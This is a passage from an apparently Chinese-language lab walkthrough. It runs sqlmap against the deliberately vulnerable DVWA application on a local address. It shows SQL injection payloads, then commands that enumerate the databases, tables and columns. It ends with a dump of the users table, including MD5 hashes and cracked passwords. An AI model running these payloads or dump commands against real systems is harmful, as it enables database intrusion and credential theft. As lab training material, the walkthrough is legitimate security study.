BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[11:50:36] [INFO] target URL appears to have 2 columns in query[11:50:36] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection points with a total of 41 HTTP(s) requests:---Place: GETParameter: idType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1' AND 4334=4334 AND 'iasX'='iasX&Submit=SubmitType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clausePayload: id=1' AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END)),0x7163716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zAHU'='zAHU&Submit=SubmitType: UNION queryTitle: MySQL UNION query (NULL) - 2 columnsPayload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626e6f71,0x4b497150534967787451,0x7163716271)#&Submit=SubmitType: AND/OR time-based blindTitle: MySQL > 5.0.11 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'xfNp'='xfNp&Submit=Submit---[11:50:40] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx)web application technology: PHP 5.3.2, Apache 2.2.14back-end DBMS: MySQL 5.0[11:50:40] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.10.10.129'[*] shutting down at 11:50:40root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id --dbs可以看出返回数据库为：[11:53:32] [WARNING] reflective value(s) found and filtering outavailable databases [2]:[*] dvwa[*] information_schemaroot@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa --tables查看dvwa数据库Database: dvwa[2 tables]+-----------+| guestbook || users |+-----------+root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users --columnsDatabase: dvwaTable: users[6 columns]+------------+-------------+| Column | Type |+------------+-------------+| user | varchar(15) || avatar | varchar(70) || first_name | varchar(15) || last_name | varchar(15) || password | varchar(32) || user_id | int(6) |+------------+-------------+root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users -C user,password --dumpDatabase: dvwaTable: users[5 entries]+---------+--------------------------------------------+| user | password |+---------+--------------------------------------------+| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) || admin | 21232f297a57a5a743894a0e4a801fc3 (admin) || gordonb | e99a18c428cb38d5f260853678922e03 (abc123) || pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 || smithy | 5f4dcc3b5aa765d61d8327deb882cf99 |+---------+--------------------------------------------+可以看出用户名为admin 密码是admin成功2day&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&情报收集whois 域名注册信息查询。